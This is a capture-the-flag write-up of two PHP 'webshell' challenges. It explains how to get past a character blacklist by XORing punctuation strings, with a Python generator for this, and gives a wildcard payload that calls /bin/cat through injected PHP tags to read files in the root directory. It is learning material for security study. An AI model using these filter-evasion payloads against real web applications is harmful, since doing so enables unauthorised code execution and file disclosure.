1. yi_ge_webshell
After opening the link, the following page will appear.
Code requirements: use the code passed in to construct the getFlag() function. The code must be within 50 in length and must not contain letters, numbers, or underscores.
After a lot of searching, I found that there is a way to construct a webshell that contains no numbers or letters: XOR.
When two strings are XORed in PHP, the ASCII codes of the corresponding characters are XORed bit by bit, and the result is still a string. Therefore, the getFlag() function can be constructed from the XOR of non-alphanumeric strings.
Use Python to run a script that directly computes the XOR results of the special characters.
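The author's script is not on the page. The following is an added example, not the original, of the XOR computation described above, next to a check modelled on the stated rules. The function names and the exact form of the filter are assumptions.

```python
import string

# Assumed filter, rebuilt from the stated rules (the challenge source is not on
# the page): length within 50, no letters, digits or underscores.
BANNED = set(string.ascii_letters + string.digits + "_")
# Printable ASCII punctuation that such a filter lets through.
ALLOWED = [c for c in string.punctuation if c not in BANNED]


def filter_allows(code):
    """Return True if the hypothetical character blacklist accepts `code`."""
    return len(code) <= 50 and not (set(code) & BANNED)


def xor_strings(a, b):
    """Byte-wise XOR of two equal-length strings (what PHP's ^ does on strings)."""
    return "".join(chr(ord(x) ^ ord(y)) for x, y in zip(a, b))


def xor_table():
    """Map each character reachable as allowed ^ allowed to one producing pair."""
    table = {}
    for x in ALLOWED:
        for y in ALLOWED:
            table.setdefault(chr(ord(x) ^ ord(y)), (x, y))
    return table


def xor_split(target):
    """Split `target` into two allowed-only strings whose XOR equals it."""
    table = xor_table()
    missing = [ch for ch in target if ch not in table]
    if missing:
        raise ValueError(f"not reachable from allowed characters: {missing}")
    left, right = zip(*(table[ch] for ch in target))
    return "".join(left), "".join(right)


if __name__ == "__main__":
    left, right = xor_split("getFlag")
    print(repr(left), "^", repr(right), "->", xor_strings(left, right))
    print("filter accepts both halves:", filter_allows(left), filter_allows(right))
    print("filter accepts the plain name:", filter_allows("getFlag"))
    unreachable = [c for c in string.ascii_letters if c not in xor_table()]
    print("letters the filter actually keeps out:", unreachable)
```

Both halves pass the check while their XOR is a name the check rejects, so a blacklist applied to the source text does not limit what the evaluated code can reference.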
getFlag is constructed from the XOR results, but submitting that payload directly exceeds the length limit, so consider XORing whole strings directly. In addition, the getFlag function has to be called, which involves bypassing the restriction on letters and numbers. After reading the article, I found that you can use Chinese characters to get the flag: SKCTF{yi_ge_sui_bian_xie_de_flag}
======================================================
2. ling_yi_ge_webshell
The code appears after opening the link:
Compared with the yi_ge_webshell challenge, this one adds a further restriction: $ cannot appear in the code. According to the XOR results, there are two combinations that produce this symbol: one is _ XOR {, the other is { XOR _. But the filter also forbids underscores, so this method doesn't work. Another hint is that the flag is in the root directory. After reading articles by several experts, I found that the knowledge point being tested is Linux wildcards.
Since the flag is in the root directory, you can use the wildcard /???/???/ to construct /bin/cat/ and read the files under the root directory. Put the code inside PHP tags, which gives a payload with the following structure: ?code=?><?=
/???/???/?>
Then you will get a bunch of code. Search for SKCTF to get the flag, but I don't understand the structure format very well. Why is it ?>?
flag: SKCTF{you_shi_yi_ge_sui_bian_xie_de_flag}
Refer to Wp and Mr. Mou’s articles.
========================================================